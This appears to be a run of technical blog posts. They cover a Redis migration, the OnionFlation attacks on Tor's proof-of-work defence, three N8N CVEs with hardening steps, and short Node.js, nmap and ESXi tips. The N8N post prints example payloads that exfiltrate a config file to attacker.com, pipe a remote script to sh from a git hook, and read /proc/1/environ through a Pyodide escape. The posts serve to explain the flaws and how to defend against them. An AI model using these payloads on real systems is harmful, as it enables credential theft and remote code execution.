# Output shows something like:
# db0:keys=1240,expires=1100,avg_ttl=86300000
# db5:keys=340,expires=340,avg_ttl=3598000
# db10:keys=5820,expires=5820,avg_ttl=299000

Step 2: Start new instances before touching the old one. Spin up your new Redis instances with appropriate configs for each use case. Don’t migrate anything yet.

Step 3: Dual-write during transition. Update your application to write to both the old database number and the new dedicated instance. Reads still come from the old instance. This gives you a warm new instance without a cold-start cache miss storm.

# Transition period: write to both, read from old
def set_cache(key, value, ttl):
    old_redis.select(10)
    old_redis.setex(key, ttl, value)
    new_cache_redis.setex(key, ttl, value)  # warm the new instance

def get_cache(key):
    return old_redis.get(key)  # still reading from old

Step 4: Flip reads, then remove dual-write. Once the new instance has a reasonable warm state, flip reads to the new instance. Monitor cache hit rates. Once stable for a day or two, remove the dual-write to the old database number.

Step 5: Verify and clean up. After all traffic is on dedicated instances, verify the old database numbers are empty and decommission them.

Dark flowchart showing step by step migration from multi-database Redis to separate instances
The migration path: inventory, spin up, dual-write, flip, clean up

When Multiple Databases Are Actually Fine

It would be unfair to say multiple databases are always wrong. There are genuine use cases:

  • Local development and unit tests — when you want to isolate test data from dev data on a single machine without the overhead of multiple processes. Database 0 for your running dev server, database 1 for tests that get flushed between runs.
  • Organisational separation within a single application — separating sessions, cache, and queues within one application that has identical resource requirements and tolerates the same eviction policy. This is the original intended use case.
  • Very small applications with negligible traffic — where the Redis instance is nowhere near its limits and you simply want namespace separation without the operational overhead.

The moment you have meaningfully different workloads, different eviction requirements, or need horizontal scaling, multiple databases stop being an organisational convenience and start being a liability.

What to Check Right Now

  • Run INFO keyspace — if you see more than db0 in production with significant key counts, you have work to do.
  • Check your maxmemory-policy — one policy cannot serve all use cases correctly. If you have both pipeline jobs and cache data, you need different policies.
  • Check for Redis Cluster in your roadmap — if it’s there, multiple databases will block you. Start planning the migration now, before you need to scale.
  • Audit your FLUSHDB and FLUSHALL usage — in scripts, Makefiles, CI pipelines, anywhere. Know exactly what would be affected if one of those runs in the wrong context.
  • Review slow query logs — check if slow commands in one database are causing latency spikes visible in your application metrics at the same timestamps.

Redis is an extraordinary tool. It earns its place in almost every production stack. But its database feature was designed for a simpler era when “run one Redis for everything” was the standard advice. The standard has moved on. Your architecture should too.

nJoy 😉

OnionFlation: How Attackers Weaponise Tor’s Only DoS Defence Against Itself

Tor’s proof-of-work puzzle system was designed as the one reliable defence against denial-of-service attacks on onion services. It was clever, it worked, and then a group of security researchers spent the better part of a year figuring out how to turn it into a weapon. The resulting family of attacks, dubbed OnionFlation, can take down any onion service for roughly $1.20 upfront and 10 cents an hour to maintain. The Tor project has acknowledged the issue. It is not yet patched.

OnionFlation Tor attack diagram
OnionFlation: weaponising Tor’s proof-of-work defence against the users it was built to protect.

Why Onion Services Have Always Been a DoS Magnet

Before understanding OnionFlation, you need to understand the original problem it was supposed to solve. Onion services have always been disproportionately easy to knock offline, and the reason is architectural. On the clearnet, denial-of-service defences rely on one thing above all else: knowing who is attacking you. Rate limiting, IP scrubbing, CAPTCHA walls, traffic shaping — all of these require visibility into the source of traffic. An onion service has none of that. The server never sees the client’s IP address; that is the entire point. So every standard DoS mitigation becomes inapplicable in one stroke.

The asymmetry goes further. When a malicious client wants to flood an onion service, it sends high-volume requests to the service’s introduction point over a single Tor circuit. But the server, upon receiving each request, must open a brand new Tor circuit to a different rendezvous point for every single one. Establishing a Tor circuit is computationally expensive: there is a full cryptographic key exchange at each hop. So the attacker pays once per circuit while the server pays once per request. This is the asymmetry that makes regular DoS against onion services so effective, and it has nothing to do with OnionFlation. It is just the baseline condition.

In 2023, these attacks reached a sustained peak. The Tor Project issued an official statement acknowledging the Tor network had been under heavy attack for seven months, and brought in additional team members specifically to design a structural fix.

How Onion Service Routing Actually Works

A quick detour is worth it here because the routing model is central to everything that follows. When you connect to a clearnet site over Tor, your traffic passes through three relays: a guard node, a middle node, and an exit node. The exit node then connects directly to the destination server, which sits outside Tor. The server’s IP address is public and the final hop is unencrypted (unless using HTTPS, but that is standard TLS at that point, nothing to do with Tor).

Onion services work differently. The server moves inside the Tor network. Before any clients connect, the server picks three ordinary Tor relays to act as introduction points and opens full three-hop Tor circuits to each of them. It then publishes a descriptor — containing its introduction points and its public key — into a distributed hash table spread across Tor’s network of directory servers. This is how clients discover how to reach the service.

When a client connects, the process looks like this:

# Simplified connection flow for an onion service

1. Client queries the distributed hash table for the onion URL
   → receives the list of introduction points

2. Client forms a 3-hop circuit to one introduction point

3. Client randomly selects a rendezvous point (any Tor relay)
   → forms a separate 2-hop circuit to it
   → sends the rendezvous point a secret "cookie" (a random token)

4. Client sends a message to the introduction point containing:
   - the rendezvous point's location
   - the cookie
   - all encrypted with the server's public key

5. Introduction point forwards the message to the server

6. Server forms a 3-hop circuit to the rendezvous point
   → presents the matching cookie

7. Rendezvous point stitches the two circuits together
   → client and server complete a cryptographic handshake
   → bidirectional encrypted communication begins

The end result is six hops total between client and server, with neither party knowing the other’s IP address. The rendezvous point is just blindly relaying encrypted traffic it cannot read. The price for this mutual anonymity is latency and, critically, the server-side cost of forming new Tor circuits on demand.

Tor onion service circuit diagram
Six hops, two stitched circuits, zero IP exposure. The elegance that also creates the attack surface.

Tor’s Answer: Proof-of-Work Puzzles (2023)

In August 2023, after months of sustained DoS attacks against the Tor network, the Tor Project deployed a new defence: proof-of-work puzzles — specified in full in Proposal 327 and documented at the onion services security reference. The mechanism is conceptually simple. Before the server forms a rendezvous circuit, the client must first solve a cryptographic puzzle. The server adjusts the puzzle difficulty dynamically based on observed load, broadcasting the current difficulty level globally via the same distributed hash table used for descriptors.

Critically, the difficulty is global, not per-client. There is a reason for this: giving any individual feedback to a single client would require forming a circuit first, which is exactly the expensive operation we are trying to avoid. So the puzzle difficulty is a single number that all prospective clients must solve before the server will engage with them.

For a legitimate user making a single connection, a few extra seconds is a minor inconvenience. For an attacker trying to flood the server with hundreds of requests per second, the puzzle cost scales linearly and quickly becomes infeasible. The approach brilliantly flips the asymmetry: instead of the server bearing the circuit-formation cost, the attacker now bears a cryptographic puzzle cost for every single request it wants to send. According to the paper, under active attack conditions without PoW, 95% of clients could not connect at all. With PoW active, connection times under the same attack were nearly indistinguishable from a non-attacked baseline. It was, by any measure, a success.

OnionFlation: Weaponising the Defence

The paper Onions Got Puzzled, presented at USENIX Security 2025, identified a fundamental flaw in how the puzzle difficulty update algorithm works. Rather than trying to overpower the puzzle system, the attacks trick the server into raising its own puzzle difficulty to the maximum value (10,000) without actually putting it under meaningful load. Once the difficulty is at maximum, even high-end hardware struggles to solve a single puzzle within Tor Browser’s 90-second connection timeout.

The researchers developed four distinct attack strategies.

Strategy 1: EnRush

The server evaluates its congestion state once every five minutes, then broadcasts a difficulty update. It cannot do this more frequently because each update requires writing to the distributed hash table across Tor’s global relay network; frequent writes would overwhelm it.

The server’s congestion check looks at the state of its request queue at the end of the five-minute window. It checks not just how many requests are queued but their difficulty levels. A single high-difficulty unprocessed request is enough to trigger a large difficulty increase, because the server reasons: “if clients are solving hard puzzles and still can’t get through, congestion must be severe.”

The EnRush attacker simply sends a small burst of high-difficulty solved requests in the final seconds of the measurement window. For the vast majority of the five-minute interval the queue was empty, but the server only checks once. It sees high-difficulty requests sitting unprocessed, panics, and inflates the difficulty to the maximum. Cost: $1.20 per inflation event.

Strategy 2: Temporary Turmoil

Instead of sending a few hard requests, the attacker floods the server with a massive volume of cheap, low-difficulty requests. This exploits a flaw in the difficulty update formula:

next_difficulty = total_difficulty_of_all_arrived_requests
                  ÷
                  number_of_requests_actually_processed

The server’s request queue has a maximum capacity. When it fills up, the server discards half the queue to make room. When this happens, the numerator (all arrived requests, including discarded ones) becomes very large, while the denominator (only successfully processed requests) remains low. The formula outputs an absurdly high difficulty. Cost: $2.80.

Strategy 3: Choking

Once the difficulty is inflated to the maximum via EnRush or Temporary Turmoil, the server limits itself to 16 concurrent rendezvous circuit connections. The attacker sends 16 high-difficulty requests but deliberately leaves all 16 connections half-open by refusing to complete the rendezvous handshake. The server’s connection slots are now occupied by dead-end circuits. No new legitimate connections can be accepted even from users who successfully solved the maximum-difficulty puzzle. Cost: approximately $2 per hour to maintain.

Strategy 4: Maintenance

After inflating the difficulty, the attacker needs to stop the server from lowering it again. The server decreases difficulty when it sees an empty queue at the measurement window. The maintenance strategy sends a small trickle of zero-difficulty requests, just enough to keep the queue non-empty. The current implementation counts requests regardless of their difficulty level, so even trivially cheap requests prevent the difficulty from dropping. Cost: 10 cents per hour.

OnionFlation four attack strategies diagram
EnRush and Temporary Turmoil inflate the difficulty; Choking and Maintenance hold it there.

The Theorem That Makes This Hard to Fix

The researchers did not just develop attacks. They also proved, mathematically, why this class of problem is fundamentally difficult to solve. This is where the paper becomes genuinely interesting beyond the exploit mechanics.

They demonstrate a perfect negative correlation between two properties any difficulty update algorithm could have:

  • Congestion resistance: the ability to detect and respond to a real DoS flood, raising difficulty fast enough to throttle the attacker.
  • Inflation resistance: the ability to resist being tricked into raising difficulty when there is no real load.

Theorem 1: No difficulty update algorithm can be simultaneously resistant to both congestion attacks and inflation attacks.

Maximising one property necessarily minimises the other. Tor’s current implementation sits at the congestion-resistant end of the spectrum, which is why OnionFlation attacks are cheap. Moving toward inflation resistance makes the system more vulnerable to genuine flooding attacks, which is what the PoW system was built to stop in the first place. As Martin notes in Clean Code, a system designed to solve one problem perfectly often creates the conditions for a new class of problem — the same logical structure applies here to protocol design.

The researchers tried five different algorithm tweaks. All of them failed to stop OnionFlation at acceptable cost. The best result pushed the attacker’s cost from $1.20 to $25 upfront and $0.50 an hour, which is still trivially affordable.

The Proposed Fix: Algorithm 2

After exhausting incremental tweaks, the researchers designed a new algorithm from scratch. Instead of taking a single snapshot of the request queue every five minutes, Algorithm 2 monitors the server’s dequeue rate: how fast it is actually processing requests in real time. This makes the difficulty tracking continuous rather than periodic, removing the window that EnRush exploits.

The algorithm exposes a parameter called delta that lets onion service operators tune their own trade-off between inflation resistance and congestion resistance. The results are considerably better:

# With Algorithm 2 (default delta):
# EnRush cost to reach max difficulty: $383/hour (vs $1.20 one-time previously)

# With delta increased slightly by the operator:
# EnRush cost: $459/hour

# Choking becomes moot because EnRush and Temporary Turmoil
# can no longer inflate the difficulty in the first place.

This is a 300x increase in attacker cost under the default configuration. The researchers tested it against the same attacker setup they used to validate the original OnionFlation attacks and found that Algorithm 2 completely prevented difficulty inflation via EnRush and Temporary Turmoil.

That said, the authors are careful to note this is one promising approach, not a proven optimal solution. The proof that no algorithm can fully resolve the trade-off still stands; Algorithm 2 just moves the dial considerably further toward inflation resistance while keeping congestion resistance viable.

Where Things Stand: Prop 362

The researchers responsibly disclosed their findings to the Tor Project in August 2024. The Tor Project acknowledged the issue and shortly afterwards opened Proposal 362, a redesign of the proof-of-work control loop that addresses the exact structural issues identified in the paper. As of the time of writing, Prop 362 is still marked open. The fix is not yet deployed.

The delay reflects the structural difficulty: any change to the global difficulty broadcast mechanism touches the entire Tor relay network, not just onion service code. Testing and rolling out changes at that scale without disrupting the live network is a non-trivial engineering problem, entirely separate from the cryptographic and algorithmic design questions.

What Onion Service Operators Can Do Right Now

The honest answer is: not much, beyond sensible hygiene. The vulnerability is in the PoW difficulty update mechanism, which operators cannot replace themselves. But the following steps reduce your exposure.

Keep Tor updated

When Prop 362 ships, update immediately. Track Tor releases at blog.torproject.org. The fix will be a daemon update.

# Debian/Ubuntu — keep Tor from the official Tor Project repo
apt-get update && apt-get upgrade tor

Do not disable PoW

Disabling proof-of-work entirely (HiddenServicePoWDefensesEnabled 0) removes the only available DoS mitigation and leaves you exposed to straightforward circuit-exhaustion flooding. OnionFlation is bad; unprotected flooding is worse. Leave it on.

Monitor difficulty in real time

If you have Tor’s metrics port enabled, you can track the live puzzle difficulty and get early warning of an inflation attack in progress:

# Watch the suggested effort metric live
watch -n 5 'curl -s http://127.0.0.1:9052/metrics | grep suggested_effort'

# Or pipe directly from the metrics port if configured
# tor config: MetricsPort 127.0.0.1:9052

A sudden jump to 10,000 with no corresponding load spike in your service logs is a strong indicator of an OnionFlation attack rather than a legitimate traffic event.

Keep your service lightweight

Algorithm 2 improves cost for the attacker considerably but does not eliminate inflation attacks entirely. Running a resource-efficient service (minimal memory footprint, fast request handling) means your server survives periods of elevated difficulty with less degradation for users who do manage to solve puzzles and connect.

Redundant introduction points

Tor allows specifying the number of introduction points (default 3, maximum as set in your Tor configuration). More introduction points spread the attack surface somewhat, though this is a marginal benefit since the OnionFlation attack operates via the puzzle difficulty mechanism, not by targeting specific introduction points.

# torrc: set higher introduction point count
# (consult your Tor version docs for exact directive)
HiddenServiceNumIntroductionPoints 5
Onion service hardening diagram
Hardening steps for onion service operators while waiting for Prop 362 to ship.

Sources and Further Reading

Video Attribution

Credit to Daniel Boctor for the original live demonstration of this attack, including compiling Tor from source to manually set the puzzle difficulty to 10,000 and showcasing the real-time impact on connection attempts. The full walkthrough is worth watching:


nJoy 😉

Three 9.9-Severity Holes in N8N: What They Are and How to Fix Them

If your workflow automation platform has access to your API keys, your cloud credentials, your email, and every sensitive document in your stack, it had better be airtight. N8N, one of the most popular self-hosted AI workflow tools around, just disclosed three vulnerabilities all rated 9.9 or higher on the CVSS scale. That is not a typo. Three separate critical flaws in the same release cycle. Let us walk through what is actually happening under the hood, why these bugs exist, and what you need to do to fix them.

N8N critical vulnerabilities diagram
Three 9.9-severity CVEs in N8N — a case study in why sandboxing arbitrary execution is brutally hard.

What is N8N and Why Does Any of This Matter?

N8N is a workflow automation platform in the spirit of Zapier or Make, but self-hosted and AI-native. You wire together “nodes” — small units that do things like pull from an API, run a script, clone a git repository, or execute Python — into pipelines that automate essentially anything. That last sentence is where the problem lives. When your platform’s entire value proposition is “run arbitrary code against arbitrary APIs”, the attack surface is not small.

The threat model here is not some nation-state attacker with a zero-day budget. It is this: you are running N8N at work, or in your home lab, and several people have accounts at different trust levels. One of those users turns out to be malicious, or simply careless enough to import a workflow from the internet without reading it. The three CVEs below are all authenticated attacks, meaning the attacker already has a login. But once they are in, they can compromise the entire instance and read every credential stored by every other user on the node. If you have ever wondered why the principle of least privilege exists, here is a textbook example.

CVE-2025-68613: JavaScript Template Injection via constructor.constructor

This one is elegant in the most uncomfortable sense. N8N workflows support expression nodes, small blobs of JavaScript that get evaluated to transform data as it flows through the pipeline. The bug is in how these expressions are sanitised before evaluation: they are not, at least not sufficiently.

An authenticated attacker creates a workflow with a malicious “Function” node and injects the following pattern into an expression parameter:

{{ $jmespath($input.all(), "[*].{payload: payload.expression}")[0].payload }}

The payload itself is something like this:

// Inside the malicious workflow's function node
const fn = (function(){}).constructor.constructor('return require("child_process")')();
fn.execSync('curl http://attacker.com/exfil?data=$(cat /data/config.json)', { encoding: 'utf8' });

If you recognise that constructor.constructor pattern, you have probably read about the React Server Components flight protocol RCE from 2024. The idea is the same: if you do not lock down access to the prototype chain, you can climb your way up to the Function constructor and use it to build a new function from an arbitrary string. From there, require('child_process') is just a function call away, and execSync lets you run anything with the same privileges as the N8N process.

The reason this class of bug keeps appearing is that JavaScript’s object model is a graph, not a tree. As Hofstadter might put it in Gödel, Escher, Bach, the system is self-referential by design: functions are objects, objects have constructors, constructors are functions. Trying to sandbox that without a proper allow-list is fighting the language itself.

Constructor chain injection diagram
Climbing the constructor chain: from user expression to arbitrary OS command execution.

CVE-2025-68668: Python Sandbox Bypass (“N8tescape”)

N8N supports a Python code node powered by Pyodide, a runtime that compiles CPython to WebAssembly so it can run inside a JavaScript environment. The idea is that by running Python inside WASM, you get a layer of isolation from the host. In theory, reasonable. In practice, the sandbox was implemented as a blacklist.

A blacklist sandbox is the security equivalent of putting up a sign that says “No bicycles, rollerblades, skateboards, or scooters.” The next person to arrive on a unicycle is perfectly within the rules. The correct approach is a whitelist: enumerate exactly what the sandboxed code is allowed to do and deny everything else by default.

In the case of N8N’s Python node, the blacklist missed subprocess.check_output, which is one of the most obvious ways to shell out from Python:

import subprocess
result = subprocess.check_output(['id'], shell=False)
print(result)  # uid=1000(n8n) gid=1000(n8n) ...

That alone is bad enough. But Pyodide also exposes an internal API that compounds the issue. The runtime has a method called runPython (sometimes surfaced as pyodide.runPythonAsync or accessed via the internal _api object) that evaluates Python code completely outside the sandbox restrictions. So even if the blacklist had been more thorough, an attacker could escape through the runtime’s own back door:

// From within the N8N sandbox, access Pyodide's internal runtime
const pyodide = globalThis.pyodide || globalThis._pyodide;
pyodide._api.runPython(`
import subprocess
subprocess.check_output(['cat', '/proc/1/environ'])
`);

N8N patched the obvious subprocess bypass in version 1.11.1 by making the native Python runner opt-in via an environment variable (N8N_PYTHON_ENABLED). It is disabled by default in patched builds. The Pyodide internal API bypass was disclosed shortly after and addressed in a subsequent patch.

CVE-2026-21877: Arbitrary File Write via the Git Node

The Git node in N8N lets you build workflows that clone repositories, pull updates, and interact with git as part of an automated pipeline. The vulnerability here is an arbitrary file write: an authenticated attacker can craft a workflow that causes a repository to be cloned to an attacker-controlled path on the host filesystem, outside the intended working directory.

The most likely mechanism, based on Rapid7’s write-up, is either a directory traversal in the destination path parameter, or a git hook execution issue. When you clone a repository, git can execute scripts automatically via hooks (.git/hooks/post-checkout, for example). If the N8N process clones an attacker-controlled repository without sanitising hook execution, those scripts run with the privileges of N8N:

# .git/hooks/post-checkout (inside attacker's repo)
#!/bin/sh
curl http://attacker.com/shell.sh | sh

Alternatively, a traversal in the clone target path lets the attacker overwrite arbitrary files in the N8N process’s reach, including config files, plugin scripts, or anything that gets loaded dynamically at runtime. Either way, the result is remote code execution under the N8N service account.

Git node file write vulnerability diagram
Git hooks or directory traversal in the clone target: two paths to the same outcome.

How to Fix It

Here is what you need to do, in order of priority.

1. Update N8N immediately

All three CVEs are patched. The minimum safe version is 1.11.1 for the Python sandbox fix; check the N8N releases page for the latest. If you are running Docker:

# Pull the latest patched image
docker pull n8nio/n8n:latest

# Or pin to a specific patched version
docker pull n8nio/n8n:1.11.1

# Restart your container
docker compose down && docker compose up -d

2. Disable the native Python runner if you do not need it

In patched builds the native Python execution environment is off by default. Keep it that way unless you explicitly need it. If you do need Python in N8N, add this to your environment and accept the risk of a managed, isolated execution environment:

# In your docker-compose.yml or .env
N8N_RUNNERS_ENABLED=true
N8N_RUNNER_PYTHON_ENABLED=false  # leave false unless you need it

3. Never expose N8N to the public internet

All three of these are authenticated attacks, but that does not mean “exposure is fine”. Default credentials, credential stuffing, and phishing are real vectors. Put N8N behind a VPN or a private network interface. If you are on a VPS, a simple firewall rule is the minimum:

# UFW: allow N8N only from your own IP or VPN range
ufw deny 5678
ufw allow from 10.8.0.0/24 to any port 5678  # VPN subnet example

4. Run N8N as a non-privileged user with a restricted filesystem

N8N should not run as root. If it does, any RCE immediately becomes a full server compromise. In Docker, set a non-root user and mount only the volumes N8N actually needs:

services:
  n8n:
    image: n8nio/n8n:latest
    user: "1000:1000"
    volumes:
      - n8n_data:/home/node/.n8n  # only the data volume, nothing else
    environment:
      - N8N_RUNNERS_ENABLED=true

5. Enforce strict workflow permissions

In N8N’s settings, limit which users can create or modify workflows. The principle of least privilege applies here just as it does anywhere else in your infrastructure. A user who only needs to trigger existing workflows has no business being able to create a Function node.

# Restrict workflow creation to admins only via N8N environment
N8N_RESTRICT_FILE_ACCESS_TO=true
N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true

6. Audit stored credentials

If your N8N instance was exposed and you suspect compromise, rotate every credential stored in it. API keys, OAuth tokens, database passwords, all of it. N8N stores credentials encrypted at rest, but if the process was compromised, the encryption keys were in memory and accessible. Treat all stored secrets as leaked.

Security hardening checklist diagram
Update, isolate, restrict: the three-step response to any critical CVE in a self-hosted tool.

The Bigger Picture: Sandboxing Arbitrary Code Is a Hard Problem

None of this is unique to N8N. Any platform whose core proposition is “run whatever code you like” faces the same fundamental tension. Sandboxing is not a feature you bolt on after the fact; it has to be the architectural foundation. The Pragmatic Programmer puts it well: “Design to be tested.” You could equally say “design to be breached” — assume code will escape the sandbox and build your layers of defence accordingly.

The blacklist vs. whitelist distinction matters enormously here. A whitelist sandbox says: “you may use these ten system calls and nothing else.” A blacklist sandbox says: “you may not use these hundred things,” and then waits for an attacker to find item 101. Kernel-level sandboxing tools like seccomp-bpf on Linux are the right building block for the whitelist approach in a container environment. Language-level tricks — Pyodide, V8 isolates, WASM boundaries — are useful layers but are not sufficient on their own.

The complicating factor, as the Low Level video below notes, is that N8N’s architecture has many nodes and the contracts between them multiply the surface area considerably. Getting every node’s sandbox right simultaneously, especially under active development with a small team, is genuinely difficult. These CVEs are a reminder that security review needs to scale with the feature count, not lag behind it.

Video Attribution

Credit to the Low Level channel for the original technical breakdown of these CVEs. The walkthrough of the constructor injection exploit and the Pyodide internals is worth watching in full:


nJoy 😉

Async waterfall example nodejs

To avoid callback hell , a very useful tool for structuring calls in a sequence and make sure the steps pass the data to the next step.

var async = require('async');

async.waterfall(
    [
        function(callback) {
            callback(null, 'Yes', 'it');
        },
        function(arg1, arg2, callback) {
            var caption = arg1 +' and '+ arg2;
            callback(null, caption);
        },
        function(caption, callback) {
            caption += ' works!';
            callback(null, caption);
        }
    ],
    function (err, caption) {
        console.log(caption);
        // Node.js and JavaScript Rock!
    }
);

nJoy 😉

Node.js Start script or run command and handoff to OS (no waiting)

Sometimes you want to run something in the OS from your node code but you do not want to follow it or have a callback posted on your stack. The default for child_process spawning is to hold on to a handle and park a callback on the stack. however there is an option which is called detached.

var spawn = require('child_process').spawn;
spawn('/usr/scripts/script.sh', ['param1'], {
    detached: true
});

You can even setup the environment of the call to add stdio and stderr pipes to the call and connect them to OS fs descriptors like this:

var fs = require('fs'),
    spawn = require('child_process').spawn,
    out = fs.openSync('./out.log', 'a'),
    err = fs.openSync('./err.log', 'a');

spawn('/usr/scripts/script.sh', ['param1'], {
    stdio: [ 'ignore', out, err ], // piping stdout and stderr to out.log
    detached: true
}).unref();

The unref disconnects the process. from the parent it equates to a disown in shell.

Thanks to O/P : https://stackoverflow.com/questions/25323703/nodejs-execute-command-in-background-and-forget

Also Ref: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options

and

https://github.com/nodejs/node-v0.x-archive/issues/9255

nJoy 😉

Identify OS on remote host

For nmap to even make a guess, nmap needs to find at least 1 open and 1 closed port on a remote host. Using the previous scan results, let us find out more about the host 192.168.0.115:

# nmap -O -sV 192.168.0.115

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 12:21 CEST
Nmap scan report for 192.168.0.115
Host is up (0.00023s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.19 ((Unix) mod_ssl/2.2.19 OpenSSL/0.9.8zf DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.2.19 ((Unix) mod_ssl/2.2.19 OpenSSL/0.9.8zf DAV/2)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 29)
2049/tcp  open  nfs         2-4 (RPC #100003)
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.9 (Linux 2.6.39.3; UPnP 1.0)
MAC Address: 00:26:2D:06:39:DB (Wistron)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.38 - 3.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2.6.39.3


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds

nJoy 😉

How to quit ESXi SSH and leave background tasks running

In Linux when a console session is closed most background jobs (^Z and bg %n) will stop running when the parent ( the ssh session ) is closed because the parent sends a SIGHUP to all its children when closing (properly). Some programs can catch and ignore the SIGHUP or not handle it at all hence passing to the root init parent. The disown command in a shell removes a background job from the list to send SIGHUPs to.

In ESXi there is no disown command. However there is a way to close a shell immediately without issuing the SIGHUPs :

exec </dev/null >/dev/null 2>/dev/null

The exec command will run a command and switch it out for the current shell. Also this command will make sure the stdio and stderr are piped properly.

nJoy 😉